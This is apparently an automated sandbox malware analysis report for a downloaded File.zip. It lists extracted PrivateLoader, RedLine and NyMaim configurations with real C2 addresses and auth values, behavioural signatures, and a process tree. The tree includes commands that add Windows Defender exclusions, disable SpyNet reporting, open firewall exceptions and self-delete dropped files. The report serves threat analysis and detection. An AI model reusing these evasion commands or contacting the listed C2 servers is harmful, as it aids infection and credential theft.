Resubmissions
16-09-2022 06:07
220916-gvaj4saeen 1016-09-2022 06:06
220916-gtp86segh5 116-09-2022 05:24
220916-f36rvaaeal 1015-09-2022 08:38
220915-kj2e8scdh7 10Analysis
-
max time kernel
1800s -
max time network
1802s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
15-09-2022 08:38
General
-
Target
https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=0
Score
10/10
Malware Config
Extracted
Family
privateloader
C2
http://163.123.143.4/proxies.txt
http://107.182.129.251/server.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
163.123.143.12
http://91.241.19.125/pub.php?pub=one
http://sarfoods.com/index.php
Attributes
-
payload_url
https://vipsofts.xyz/files/mega.bmp
Extracted
Family
redline
Botnet
nam6.2
C2
103.89.90.61:34589
Attributes
-
auth_value
4040fe7c77de89cf1a6f4cebd515c54c
Extracted
Family
nymaim
C2
208.67.104.97
85.31.46.167
Extracted
Family
redline
Botnet
ruzki14
C2
176.113.115.146:9582
Attributes
-
auth_value
688c6d70531c05d3fba22723e72366f6
Extracted
Family
redline
Botnet
3108_RUZKI
C2
213.219.247.199:9452
Attributes
-
auth_value
f71fed1cd094e4e1eb7ad1c53e542bca
Extracted
Family
redline
Botnet
@joker_reborn
C2
20.111.62.187:12944
Attributes
-
auth_value
3bef5f3e00b75e26d1f1fc60672cd81d
Extracted
Family
redline
Botnet
RRMoney
C2
81.161.229.243:28479
Attributes
-
auth_value
c8bfeb3e3eb6477db90f28556d840227
Signatures
-
DcRat 16 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detects Smokeloader packer 4 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs
-
Modifies system executable filetype association 2 TTPs 2 IoCs
-
NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 7 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Blocklisted process makes network request 13 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 57 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 64 IoCs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
VMProtect packed file 4 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Loads dropped DLL 33 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 3 IoCs
Detects Themida, an advanced Windows software protection system.
-
Unexpected DNS network traffic destination 64 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Drops Chrome extension 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 15 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 6 IoCs
-
Drops file in Program Files directory 27 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 23 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 33 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 49 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
NTFS ADS 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: AddClipboardFormatListener 12 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=01⤵
- DcRat
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4972 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4972 CREDAT:17414 /prefetch:22⤵
- Modifies Internet Explorer settings
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4488.0.26075752\1138136529" -parentBuildID 20200403170909 -prefsHandle 1692 -prefMapHandle 1656 -prefsLen 1 -prefMapSize 220117 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4488 "\\.\pipe\gecko-crash-server-pipe.4488" 1772 gpu3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4488.3.407678508\1441612830" -childID 1 -isForBrowser -prefsHandle 2520 -prefMapHandle 2532 -prefsLen 112 -prefMapSize 220117 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4488 "\\.\pipe\gecko-crash-server-pipe.4488" 1552 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4488.13.749488598\1120118449" -childID 2 -isForBrowser -prefsHandle 3668 -prefMapHandle 3664 -prefsLen 6894 -prefMapSize 220117 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4488 "\\.\pipe\gecko-crash-server-pipe.4488" 3684 tab3⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\File\" -spe -an -ai#7zMap22551:70:7zEvent92661⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Downloads\File\Install.exe"C:\Users\Admin\Downloads\File\Install.exe"1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\r8lbkWQfRJRWbe_59FWmzC6W.exe"C:\Users\Admin\Pictures\Minor Policy\r8lbkWQfRJRWbe_59FWmzC6W.exe"2⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\XGO12vPjdlO9dIYpn4sbPfs7.exe"C:\Users\Admin\Pictures\Minor Policy\XGO12vPjdlO9dIYpn4sbPfs7.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\bojhOTpGafDSdwgTOMi65gbk.exe"C:\Users\Admin\Pictures\Minor Policy\bojhOTpGafDSdwgTOMi65gbk.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\uZb9.CPl",3⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\uZb9.CPl",4⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\uZb9.CPl",5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\uZb9.CPl",6⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Minor Policy\ApplptWkQB25f0DNGlWMCzD7.exe"C:\Users\Admin\Pictures\Minor Policy\ApplptWkQB25f0DNGlWMCzD7.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 4643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 7723⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 7803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 8123⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 8163⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 10163⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 13603⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ApplptWkQB25f0DNGlWMCzD7.exe" /f & erase "C:\Users\Admin\Pictures\Minor Policy\ApplptWkQB25f0DNGlWMCzD7.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ApplptWkQB25f0DNGlWMCzD7.exe" /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 5203⤵
- Program crash
-
C:\Users\Admin\Pictures\Minor Policy\LxGB3SKUpRlcu64orV9jCMoi.exe"C:\Users\Admin\Pictures\Minor Policy\LxGB3SKUpRlcu64orV9jCMoi.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4168 -s 4283⤵
- Program crash
-
C:\Users\Admin\Pictures\Minor Policy\lg1xSuUVOPN_eEhZwSIUNNHW.exe"C:\Users\Admin\Pictures\Minor Policy\lg1xSuUVOPN_eEhZwSIUNNHW.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\1VNooRSoNkENLR2DUCTp1c9o.exe"C:\Users\Admin\Documents\1VNooRSoNkENLR2DUCTp1c9o.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\72Y2NrMHkLeIs8fT_tPMJs3g.exe"C:\Users\Admin\Pictures\Adobe Films\72Y2NrMHkLeIs8fT_tPMJs3g.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\sQEmHvOlzkmgCSSfjEk8I55m.exe"C:\Users\Admin\Pictures\Adobe Films\sQEmHvOlzkmgCSSfjEk8I55m.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 4565⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 7645⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 7725⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 7925⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 8605⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 8885⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 8485⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 13805⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "sQEmHvOlzkmgCSSfjEk8I55m.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\sQEmHvOlzkmgCSSfjEk8I55m.exe" & exit5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "sQEmHvOlzkmgCSSfjEk8I55m.exe" /f6⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 13165⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\hRk5tp8OgM4RL5eLxUA4h8p3.exe"C:\Users\Admin\Pictures\Adobe Films\hRk5tp8OgM4RL5eLxUA4h8p3.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\WuAHnGmkKkacwdzeRC_t21Qb.exe"C:\Users\Admin\Pictures\Adobe Films\WuAHnGmkKkacwdzeRC_t21Qb.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\eXrPvzSEy_JN2ovtHnGOIpDz.exe"C:\Users\Admin\Pictures\Adobe Films\eXrPvzSEy_JN2ovtHnGOIpDz.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\eXrPvzSEy_JN2ovtHnGOIpDz.exe"C:\Users\Admin\Pictures\Adobe Films\eXrPvzSEy_JN2ovtHnGOIpDz.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\fgC6_WrRN7kTbSbkuhwDgVB4.exe"C:\Users\Admin\Pictures\Adobe Films\fgC6_WrRN7kTbSbkuhwDgVB4.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5896 -s 4765⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\vbwjpQQoXK5Odr2JOkOVJJTE.exe"C:\Users\Admin\Pictures\Adobe Films\vbwjpQQoXK5Odr2JOkOVJJTE.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\scg3EPRKTyVPTu2yXVf_Zdv7.exe"C:\Users\Admin\Pictures\Adobe Films\scg3EPRKTyVPTu2yXVf_Zdv7.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\robocopy.exerobocopy /?5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Organisations.jpg & ping -n 5 localhost5⤵
-
C:\Windows\SysWOW64\cmd.execmd6⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AvastUI.exe"7⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "avastui.exe"7⤵
-
C:\Windows\SysWOW64\find.exefind /I /N "avgui.exe"7⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AVGUI.exe"7⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^rCLEJGCiZAx$" Member.jpg7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Respect.exe.pifRespect.exe.pif z7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Respect.exe.pifC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Respect.exe.pif Films\scg3EPRKTyVPTu2yXVf_Zdv7.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 57⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost6⤵
- Runs ping.exe
-
C:\Users\Admin\Pictures\Adobe Films\HpgzMovzA_BmIo2HIYJELC7h.exe"C:\Users\Admin\Pictures\Adobe Films\HpgzMovzA_BmIo2HIYJELC7h.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\7CMAGXU.CPl",5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\7CMAGXU.CPl",6⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\7CMAGXU.CPl",7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\7CMAGXU.CPl",8⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\Jv4aqh1lROC2TG3qRzYaTxRX.exe"C:\Users\Admin\Pictures\Adobe Films\Jv4aqh1lROC2TG3qRzYaTxRX.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=7474⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-92E5K.tmp\Jv4aqh1lROC2TG3qRzYaTxRX.tmp"C:\Users\Admin\AppData\Local\Temp\is-92E5K.tmp\Jv4aqh1lROC2TG3qRzYaTxRX.tmp" /SL5="$2067E,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\Jv4aqh1lROC2TG3qRzYaTxRX.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=7475⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Programs\Adblock\Adblock.exe"C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=e32e1c791663238616 --downloadDate=2022-09-15T10:42:15 --distId=marketator --pid=7476⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Programs\Adblock\crashpad_handler.exeC:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\040b7b7b-c17f-4746-4812-46eb51e417d0.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\040b7b7b-c17f-4746-4812-46eb51e417d0.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\040b7b7b-c17f-4746-4812-46eb51e417d0.run\__sentry-breadcrumb2" --initial-client-data=0x3f0,0x3f4,0x3f8,0x3cc,0x3fc,0x7ff7275fbc80,0x7ff7275fbca0,0x7ff7275fbcb87⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Update-928d80bd-8811-4ce6-87f2-494c46573809\AdblockInstaller.exe"C:\Users\Admin\AppData\Local\Temp\Update-928d80bd-8811-4ce6-87f2-494c46573809\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-6DN0I.tmp\AdblockInstaller.tmp"C:\Users\Admin\AppData\Local\Temp\is-6DN0I.tmp\AdblockInstaller.tmp" /SL5="$90588,11574525,792064,C:\Users\Admin\AppData\Local\Temp\Update-928d80bd-8811-4ce6-87f2-494c46573809\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\netsh.exeC:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE7⤵
- Modifies Windows Firewall
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -install7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -start7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"6⤵
-
C:\Windows\system32\reg.exereg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f7⤵
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"6⤵
-
C:\Windows\system32\reg.exereg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f7⤵
- Modifies registry key
-
C:\Users\Admin\Pictures\Adobe Films\EbUbLgoJRU3KUbWQQNTgWziP.exe"C:\Users\Admin\Pictures\Adobe Films\EbUbLgoJRU3KUbWQQNTgWziP.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\x9CEQ6uzwYF2OeJPnmuJesv2.exe"C:\Users\Admin\Pictures\Adobe Films\x9CEQ6uzwYF2OeJPnmuJesv2.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSC296.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSD4E5.tmp\Install.exe.\Install.exe /S /site_id "525403"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵
-
